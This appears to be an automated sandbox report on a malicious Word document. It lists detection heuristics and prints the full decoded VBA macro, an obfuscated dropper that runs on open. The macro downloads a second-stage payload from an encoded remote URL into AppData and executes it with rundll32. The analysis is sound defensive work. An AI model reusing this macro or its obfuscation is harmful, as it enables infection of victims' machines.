MALICIOUS
198
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro utilizes URLDownloadToFile to download a second-stage payload from a remote source, and also references a LOLBin, indicating it is designed to execute arbitrary code. The obfuscated VBA code suggests an attempt to evade detection.
Heuristics 7
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Declare PtrSafe Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As LongPtr Declare PtrSafe Function tKrVkWgZvDbp2EuOlrqeD0YjVF Lib "Urlmon" Alias "URLDownloadToFileA" (ByVal pCall As Long, ByVal szUrl As String, ByVal szFile As String, ByVal drRes As Long, ByVal lpfn As Long) As LongPtr Declare PtrSafe Function GetWindowContextHelpId Lib "user32" (ByVal hWnd As LongPtr) As LongPtr -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Dim DkasdaSS As String DkasdaSS = "rundll32" Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = juLCpharY0CWnWoZJc12FMcPr2() + jlmuS8WZ6OSX9aWPwRlzrXSX75("f{jmbjujoJ-") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Dim BASRGA45YUI As Double -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Public Function juLCpharY0CWnWoZJc12FMcPr2() As String juLCpharY0CWnWoZJc12FMcPr2 = Environ(jlmuS8WZ6OSX9aWPwRlzrXSX75("bubEqqB")) & Application.PathSeparator & jlmuS8WZ6OSX9aWPwRlzrXSX75("mme/fnbofmjg") End Function -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 21751 bytes |
SHA-256: 46604b19fc070c53f610fbf4726e0f8c1ce0ed5a4e2b79ed82881ed6e8ae80fa |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function sRR8R6UwVzEohE9OaZHvdbfzaK(nLc4wbiGSclhh02Jc5GccutQW8 As String, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 As Long, seafcLixxPqKZ3qI1ROvnZCmqI As Long) As String
Dim Jz8TDzDIWW7dHtIe3KJ3Kr01d8 As String
Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = nLc4wbiGSclhh02Jc5GccutQW8
For sSQ7cyzUfszdM0HQgULYJenJf2 = 1 To HSaHCs1Y8k5qSqZ0EkkgAUPkD3
Mid$(Jz8TDzDIWW7dHtIe3KJ3Kr01d8, sSQ7cyzUfszdM0HQgULYJenJf2, 1) = Mid$(nLc4wbiGSclhh02Jc5GccutQW8, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 - sSQ7cyzUfszdM0HQgULYJenJf2 + seafcLixxPqKZ3qI1ROvnZCmqI, 1)
Next
sRR8R6UwVzEohE9OaZHvdbfzaK = Jz8TDzDIWW7dHtIe3KJ3Kr01d8
End Function
Public Function H2LySOwXlEI77WCMEhKHugzc63(nLc4wbiGSclhh02Jc5GccutQW8 As String, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 As Long, seafcLixxPqKZ3qI1ROvnZCmqI As Long) As String
Dim Jz8TDzDIWW7dHtIe3KJ3Kr01d8 As String
For sSQ7cyzUfszdM0HQgULYJenJf2 = 1 To HSaHCs1Y8k5qSqZ0EkkgAUPkD3
Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = Chr(Asc(Mid$(nLc4wbiGSclhh02Jc5GccutQW8, sSQ7cyzUfszdM0HQgULYJenJf2, 1)) - seafcLixxPqKZ3qI1ROvnZCmqI)
Mid$(nLc4wbiGSclhh02Jc5GccutQW8, sSQ7cyzUfszdM0HQgULYJenJf2, 1) = Jz8TDzDIWW7dHtIe3KJ3Kr01d8
Next
H2LySOwXlEI77WCMEhKHugzc63 = nLc4wbiGSclhh02Jc5GccutQW8
End Function
Private Sub Document_Open()
Dim BASRGA45YUI As Double
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
uFZ4TizWTyG7QIHca8hqZk7pKs
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
End Sub
Private Sub uFZ4TizWTyG7QIHca8hqZk7pKs()
mff32k.aD4PU56L9QVXGoJRRltTLSjopH
Dim BASRGA45YUI As Double
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
BASRGA45YUI = BASRGA45YUI + 0.679499 * Sin(4.44954 + 55.1484 * T)
mff32k.XcPWB3RQXXTUbjMmHTRfZm13zl
End Sub
Attribute VB_Name = "XRS33d"
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function CreateIcon Lib "user32" (ByVal hsdfkjo3lw4h5o3ghkijfs As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal nPlanes As Byte, ByVal nBitsPixel As Byte, lpANDbits As Byte, lpXORbits As Byte) As LongPtr
Declare PtrSafe Function CreateIconFromResource Lib "user32" (presbits As Byte, ByVal dwResSize As LongPtr, ByVal fIcon As LongPtr, ByVal dwVer As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
Declare PtrSafe Function DdeAddData Lib "user32" Alias "DdeAddDataA" (ByVal hData As LongPtr, pSrc As Byte, ByVal cb As LongPtr, ByVal cbOff As LongPtr) As LongPtr
Declare PtrSafe Function DdeClientTransaction Lib "user32" (pData As Byte, ByVal cbData As LongPtr, ByVal hConv As LongPtr, ByVal hszItem As LongPtr, ByVal wFmt As LongPtr, ByVal wType As LongPtr, ByVal dwTimeout As LongPtr, pdwResult As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal hConv As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As LongPtr) As LongPtr
Declare PtrSafe Function CloseWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
Declare PtrSafe Function DdeGetData Lib "user32" Alias "DdeGetDataA" (ByVal hData As LongPtr, pDst As Byte, ByVal cbMax As LongPtr, ByVal cbOff As LongPtr) As LongPtr
Declare PtrSafe Function DdeNameService Lib "user32" (ByVal idInst As LongPtr, ByVal hsz1 As LongPtr, ByVal hsz2 As LongPtr, ByVal afCmd As LongPtr) As LongPtr
Declare PtrSafe Function DefDlgProc Lib "user32" Alias "DefDlgProcA" (ByVal hDlg As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function DeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr, ByVal hWnd As LongPtr, ByVal hWndInsertAfter As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal cx As LongPtr, ByVal cy As LongPtr, ByVal wFlags As LongPtr) As LongPtr
Declare PtrSafe Function DestroyAcceleratorTable Lib "user32" (ByVal haccel As LongPtr) As LongPtr
Declare PtrSafe Function DestroyCaret Lib "user32" () As LongPtr
Declare PtrSafe Function DestroyCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function DestroyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DestroyMenu Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function DestroyWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectComboBoxEx Lib "user32" Alias "DlgDirSelectComboBoxExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idComboBox As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idListBox As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function DrawIcon Lib "user32" (ByVal hDC As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DrawIconEx Lib "user32" (ByVal hDC As LongPtr, ByVal xLeft As LongPtr, ByVal yTop As LongPtr, ByVal hIcon As LongPtr, ByVal cxWidth As LongPtr, ByVal cyWidth As LongPtr, ByVal istepIfAniCur As LongPtr, ByVal hbrFlickerFreeDraw As LongPtr, ByVal diFlags As LongPtr) As Boolean
Declare PtrSafe Function DrawMenuBar Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function EndDeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr) As LongPtr
Declare PtrSafe Function EndDialog Lib "user32" (ByVal hDlg As LongPtr, ByVal nResult As LongPtr) As LongPtr
Declare PtrSafe Function EnumChildWindows Lib "user32" (ByVal hWndParent As LongPtr, ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As Boolean
Declare PtrSafe Function EnumClipboardFormats Lib "user32" (ByVal wFormat As LongPtr) As LongPtr
Declare PtrSafe Function EnumDesktops Lib "user32" Alias "EnumDesktopsA" (ByVal hWinSta As LongPtr, ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As Boolean
Declare PtrSafe Function EnumProps Lib "user32" Alias "EnumPropsA" (ByVal hWnd As LongPtr, ByVal lpEnumFunc As LongPtr) As LongPtr
Declare PtrSafe Function FreeDDElParam Lib "user32" (ByVal msg As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function GetActiveWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer
Declare PtrSafe Function GetCapture Lib "user32" () As LongPtr
Declare PtrSafe Function GetCaretBlinkTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetClassLong Lib "user32" Alias "GetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As LongPtr, ByVal lpClassName As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardData Lib "user32" Alias "GetClipboardDataA" (ByVal wFormat As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As LongPtr, ByVal lpString As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardOwner Lib "user32" () As LongPtr
Declare PtrSafe Function EnumPropsEx Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As LongPtr, ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Sub bdfkij2bw3kjv Lib "kernel32" Alias "Sleep" (ByVal cnkqjb3kjb As LongPtr)
Declare PtrSafe Function EnumThreadWindows Lib "user32" (ByVal dwThreadId As LongPtr, ByVal lpfn As LongPtr, ByVal lParam As LongPtr) As Boolean
Declare PtrSafe Function EnumWindowStations Lib "user32" Alias "EnumWindowStationsA" (ByVal lpEnumFunc As LongPtr, ByVal lParam As LongPtr) As Boolean
Declare PtrSafe Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As LongPtr, ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindows Lib "user32" (ByVal dwReserved As LongPtr, ByVal uReturnCode As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindowsEx Lib "user32" (ByVal uFlags As LongPtr, ByVal dwReserved As LongPtr) As LongPtr
Declare PtrSafe Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
Declare PtrSafe Function GetClipboardViewer Lib "user32" () As LongPtr
Declare PtrSafe Function SetClipboardData Lib "user32" Alias "SetClipboardDataA" (ByVal wFormat As LongPtr, ByVal hMem As LongPtr) As LongPtr
Declare PtrSafe Function SetClipboardViewer Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function SetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wValue As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function SetDlgItemText Lib "user32" Alias "SetDlgItemTextA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpString As String) As LongPtr
Declare PtrSafe Function SetDoubleClickTime Lib "user32" (ByVal wCount As LongPtr) As LongPtr
Declare PtrSafe Function SetFocus Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetForegroundWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetMenu Lib "user32" (ByVal hWnd As LongPtr, ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuContextHelpId Lib "user32" (ByVal hMenu As LongPtr, ByVal dw As LongPtr) As Boolean
Declare PtrSafe Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As LongPtr, ByVal uItem As LongPtr, ByVal fByPos As LongPtr) As Boolean
Declare PtrSafe Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As LongPtr, ByVal nPosition As LongPtr, ByVal wFlags As LongPtr, ByVal hBitmapUnchecked As LongPtr, ByVal hBitmapChecked As LongPtr) As LongPtr
Declare PtrSafe Function SetMessageExtraInfo Lib "user32" (ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SetMessageQueue Lib "user32" (ByVal cMessagesMax As LongPtr) As Boolean
Declare PtrSafe Function SetWindowRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal bRedraw As Boolean) As LongPtr
Declare PtrSafe Function SetWindowsHook Lib "user32" Alias "SetWindowsHookA" (ByVal nFilterType As LongPtr, ByVal pfnFilterProc As LongPtr) As LongPtr
Declare PtrSafe Function SwapMouseButton Lib "user32" (ByVal bSwap As LongPtr) As LongPtr
Declare PtrSafe Function SwitchDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As LongPtr, ByVal uParam As LongPtr, ByVal lpvParam As Any, ByVal fuWinIni As LongPtr) As LongPtr
Declare PtrSafe Function ToAsciiEx Lib "user32" (ByVal uVirtKey As LongPtr, ByVal uScanCode As LongPtr, lpKeyState As Byte, lpChar As Integer, ByVal uFlags As LongPtr, ByVal dwhkl As LongPtr) As LongPtr
Declare PtrSafe Function ToUnicode Lib "user32" (ByVal wVirtKey As LongPtr, ByVal wScanCode As LongPtr, lpKeyState As Byte, ByVal pwszBuff As String, ByVal cchBuff As LongPtr, ByVal wFlags As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyboardState Lib "user32" (pbKeyState As Byte) As LongPtr
Declare PtrSafe Function GetKeyboardType Lib "user32" (ByVal nTypeFlag As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyNameText Lib "user32" Alias "GetKeyNameTextA" (ByVal lParam As LongPtr, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Declare PtrSafe Function GetKeyState Lib "user32" (ByVal nVirtKey As LongPtr) As Integer
Declare PtrSafe Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As LongPtr) As LongPtr
Declare PtrSafe Function GetMenu Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetMenuCheckMarkDimensions Lib "user32" () As LongPtr
Declare PtrSafe Function GetMenuItemCount Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function GetQueueStatus Lib "user32" (ByVal fuFlags As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollPos Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollRange Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr, lpMinPos As LongPtr, lpMaxPos As LongPtr) As LongPtr
Declare PtrSafe Function GetTabbedTextExtent Lib "user32" Alias "GetTabbedTextExtentA" (ByVal hDC As LongPtr, ByVal lpString As String, ByVal nCount As LongPtr, ByVal nTabPositions As LongPtr, lpnTabStopPositions As LongPtr) As LongPtr
Declare PtrSafe Function GetThreadDesktop Lib "user32" (ByVal dwThread As LongPtr) As LongPtr
Declare PtrSafe Function GetTopWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function grBBbadfUPIoGM9ogqjvD2jA4E Lib "kernel32" Alias "Sleep" (ByVal Time As LongPtr) As LongPtr
Declare PtrSafe Function GetUpdateRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal fErase As LongPtr) As LongPtr
Declare PtrSafe Function GetDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDoubleClickTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As LongPtr
Declare PtrSafe Function tKrVkWgZvDbp2EuOlrqeD0YjVF Lib "Urlmon" Alias "URLDownloadToFileA" (ByVal pCall As Long, ByVal szUrl As String, ByVal szFile As String, ByVal drRes As Long, ByVal lpfn As Long) As LongPtr
Declare PtrSafe Function GetWindowContextHelpId Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetWindowDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function ReuseDDElParam Lib "user32" (ByVal lParam As LongPtr, ByVal msgIn As LongPtr, ByVal msgOut As LongPtr, ByVal uiLo As LongPtr, ByVal uiHi As LongPtr) As LongPtr
Declare PtrSafe Function SendDlgItemMessage Lib "user32" Alias "SendDlgItemMessageA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, lParam As LongPtr) As LongPtr
Declare PtrSafe Function SendMessageCallback Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr, ByVal lpResultCallBack As LongPtr, ByVal dwData As LongPtr) As LongPtr
Declare PtrSafe Function SqMgvI9eao7x7LInLUt7xHXOKW Lib "shell32" Alias "ShellExecuteA" (ByVal fg As LongPtr, ByVal er As String, ByVal jtr As String, ByVal vwer4 As String, ByVal ity5 As String, ByVal vwe3 As Long) As Long
Declare PtrSafe Function SendMessageTimeout Lib "user32" Alias "SendMessageTimeoutA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr, ByVal fuFlags As LongPtr, ByVal uTimeout As LongPtr, lpdwResult As LongPtr) As LongPtr
Declare PtrSafe Function SendNotifyMessage Lib "user32" Alias "SendNotifyMessageA" (ByVal hWnd As LongPtr, ByVal msg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SetActiveWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCapture Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal dwNewLong As LongPtr) As LongPtr
Declare PtrSafe Function SetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal wNewWord As LongPtr) As LongPtr
Attribute VB_Name = "mff32k"
Public Function aD4PU56L9QVXGoJRRltTLSjopH()
Dim gNzsePkM8e5nPbGzQw77JJGiLQ As String
gNzsePkM8e5nPbGzQw77JJGiLQ = jlmuS8WZ6OSX9aWPwRlzrXSX75("wNqxrl9vsJ1P4GBk5V0xCjehLpiWR[mMHtZJOQ01778:74:620pqnbd084/782/1:/57200;quui")
XRS33d.tKrVkWgZvDbp2EuOlrqeD0YjVF 0, gNzsePkM8e5nPbGzQw77JJGiLQ, juLCpharY0CWnWoZJc12FMcPr2(), 0, 0
End Function
Public Function juLCpharY0CWnWoZJc12FMcPr2() As String
juLCpharY0CWnWoZJc12FMcPr2 = Environ(jlmuS8WZ6OSX9aWPwRlzrXSX75("bubEqqB")) & Application.PathSeparator & jlmuS8WZ6OSX9aWPwRlzrXSX75("mme/fnbofmjg")
End Function
Public Function XcPWB3RQXXTUbjMmHTRfZm13zl()
Dim Jz8TDzDIWW7dHtIe3KJ3Kr01d8 As String
Dim DkasdaSS As String
DkasdaSS = "rundll32"
Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = juLCpharY0CWnWoZJc12FMcPr2() + jlmuS8WZ6OSX9aWPwRlzrXSX75("f{jmbjujoJ-")
XRS33d.SqMgvI9eao7x7LInLUt7xHXOKW 0, jlmuS8WZ6OSX9aWPwRlzrXSX75("ofqp"), DkasdaSS, Jz8TDzDIWW7dHtIe3KJ3Kr01d8, vbNullString, 0
End Function
Function jlmuS8WZ6OSX9aWPwRlzrXSX75(nLc4wbiGSclhh02Jc5GccutQW8 As String) As String
jlmuS8WZ6OSX9aWPwRlzrXSX75 = H2LySOwXlEI77WCMEhKHugzc63(sRR8R6UwVzEohE9OaZHvdbfzaK(nLc4wbiGSclhh02Jc5GccutQW8, Len(nLc4wbiGSclhh02Jc5GccutQW8), 1), Len(nLc4wbiGSclhh02Jc5GccutQW8), 1)
End Function
Public Function sRR8R6UwVzEohE9OaZHvdbfzaK(nLc4wbiGSclhh02Jc5GccutQW8 As String, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 As Long, seafcLixxPqKZ3qI1ROvnZCmqI As Long) As String
Dim Jz8TDzDIWW7dHtIe3KJ3Kr01d8 As String
Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = nLc4wbiGSclhh02Jc5GccutQW8
For sSQ7cyzUfszdM0HQgULYJenJf2 = 1 To HSaHCs1Y8k5qSqZ0EkkgAUPkD3
Mid$(Jz8TDzDIWW7dHtIe3KJ3Kr01d8, sSQ7cyzUfszdM0HQgULYJenJf2, 1) = Mid$(nLc4wbiGSclhh02Jc5GccutQW8, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 - sSQ7cyzUfszdM0HQgULYJenJf2 + seafcLixxPqKZ3qI1ROvnZCmqI, 1)
Next
sRR8R6UwVzEohE9OaZHvdbfzaK = Jz8TDzDIWW7dHtIe3KJ3Kr01d8
End Function
Public Function H2LySOwXlEI77WCMEhKHugzc63(nLc4wbiGSclhh02Jc5GccutQW8 As String, HSaHCs1Y8k5qSqZ0EkkgAUPkD3 As Long, seafcLixxPqKZ3qI1ROvnZCmqI As Long) As String
Dim Jz8TDzDIWW7dHtIe3KJ3Kr01d8 As String
For sSQ7cyzUfszdM0HQgULYJenJf2 = 1 To HSaHCs1Y8k5qSqZ0EkkgAUPkD3
Jz8TDzDIWW7dHtIe3KJ3Kr01d8 = Chr(Asc(Mid$(nLc4wbiGSclhh02Jc5GccutQW8, sSQ7cyzUfszdM0HQgULYJenJf2, 1)) - seafcLixxPqKZ3qI1ROvnZCmqI)
Mid$(nLc4wbiGSclhh02Jc5GccutQW8, sSQ7cyzUfszdM0HQgULYJenJf2, 1) = Jz8TDzDIWW7dHtIe3KJ3Kr01d8
Next
H2LySOwXlEI77WCMEhKHugzc63 = nLc4wbiGSclhh02Jc5GccutQW8
End Function
Attribute VB_Name = "UserForm1"
